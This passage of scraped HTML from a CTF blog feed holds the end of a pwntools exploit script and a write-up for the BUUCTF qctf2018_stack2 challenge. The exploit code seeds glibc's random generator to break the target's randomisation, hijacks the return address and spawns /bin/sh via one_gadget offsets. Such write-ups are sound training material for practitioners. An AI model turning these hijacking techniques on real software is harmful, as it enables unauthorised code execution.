class="p">,</span> <span class="n">numslot</span><span class="p">,</span> <span class="n">seed</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="kc">True</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">io</span> <span class="o">=</span> <span class="n">conn</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">numslot</span><span class="o">.</span><span class="n">clear</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">recvnum</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mh">0x132A</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="mi">28</span><span class="p">,</span> <span class="s1">&#39;+&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">recvnum</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">continue</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">numslot</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x100000</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">seed</span> <span class="o">=</span> <span class="n">i</span> <span class="o">*</span> <span class="mh">0x1000</span> <span class="o">+</span> <span class="mh">0x420</span> </span></span><span class="line"><span class="cl"> <span class="n">glibc</span><span class="o">.</span><span class="n">srand</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">judgeslot</span> <span class="o">=</span> <span class="p">[</span><span class="n">glibc</span><span class="o">.</span><span class="n">rand</span><span class="p">()</span> <span class="o">%</span> <span class="mi">16</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">8</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">judgeslot</span> <span class="o">==</span> <span class="n">numslot</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">numslot</span><span class="o">.</span><span class="n">clear</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Found the correct seed: </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> <span class="n">hijacklow</span><span class="p">(</span><span class="mi">18</span><span class="p">,</span> <span class="mh">0x319ad</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">hijacklow</span><span class="p">(</span><span class="mi">26</span><span class="p">,</span> <span class="mh">0x4c139</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">itr</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x00000000000319ad: pop rbx; ret;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x4c139 posix_spawn(rsp+0xc, &#34;/bin/sh&#34;, 0, rbx, rsp+0x50, environ)</span> </span></span><span class="line"><span class="cl"><span class="c1"># constraints:</span> </span></span><span class="line"><span class="cl"><span class="c1"># address rsp+0x60 is writable</span> </span></span><span class="line"><span class="cl"><span class="c1"># rsp &amp; 0xf == 0</span> </span></span><span class="line"><span class="cl"><span class="c1"># rax == NULL || {&#34;sh&#34;, rax, r12, NULL} is a valid argv</span> </span></span><span class="line"><span class="cl"><span class="c1"># rbx == NULL || (u16)[rbx] == NULL</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x4c140 posix_spawn(rsp+0xc, &#34;/bin/sh&#34;, 0, rbx, rsp+0x50, environ)</span> </span></span><span class="line"><span class="cl"><span class="c1"># constraints:</span> </span></span><span class="line"><span class="cl"><span class="c1"># address rsp+0x60 is writable</span> </span></span><span class="line"><span class="cl"><span class="c1"># rsp &amp; 0xf == 0</span> </span></span><span class="line"><span class="cl"><span class="c1"># rcx == NULL || {rcx, rax, r12, NULL} is a valid argv</span> </span></span><span class="line"><span class="cl"><span class="c1"># rbx == NULL || (u16)[rbx] == NULL</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0xd515f execve(&#34;/bin/sh&#34;, rbp-0x40, r13)</span> </span></span><span class="line"><span class="cl"><span class="c1"># constraints:</span> </span></span><span class="line"><span class="cl"><span class="c1"># address rbp-0x38 is writable</span> </span></span><span class="line"><span class="cl"><span class="c1"># rdi == NULL || {&#34;/bin/sh&#34;, rdi, NULL} is a valid argv</span> </span></span><span class="line"><span class="cl"><span class="c1"># [r13] == NULL || r13 == NULL || r13 is a valid envp</span> </span></span></code></pre></td></tr></table> </div> </div>BUUCTF-qctf2018_stack2 题解https://blog.ratherhard.com/post/ctf-pwn/buuctf/qctf2018_stack2/Mon, 12 Jan 2026 09:58:00 +0000https://blog.ratherhard.com/post/ctf-pwn/buuctf/qctf2018_stack2/<img src="https://blog.ratherhard.com/" alt="Featured image of post BUUCTF-qctf2018_stack2 题解" /><h3 id="题目">题目 </h3><p><a class="link" href="https://buuoj.cn/challenges#qctf2018_stack2" target="_blank" rel="noopener" >题目链接</a></p> <h3 id="checksec">checksec </h3><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="373px" data-flex-grow="155" height="262" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/BUUCTF/qctf2018_stack2/checksec.png" width="408"></p> <h3 id="ida">IDA </h3><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="325px" data-flex-grow="135" height="790" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/BUUCTF/qctf2018_stack2/IDA.png" width="1072"></p> <p>有一个利用 v13 越界的漏洞,直接劫持返回地址到后门即可</p> <h3 id="backdoor">backdoor </h3><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="299px" data-flex-grow="124" height="759" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/BUUCTF/qctf2018_stack2/backdoor.png" width="947"></p> <h3 id="exp">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s2">&#34;i386&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./stack2&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;have:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;numbers</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;exit</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;change:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;132&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;number:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;155&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;exit</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;change:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;133&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;number:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;133&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;exit</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;change:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;134&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;number:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;4&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;exit</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;change:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;135&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;number:</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;8&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;exit</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;5&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div>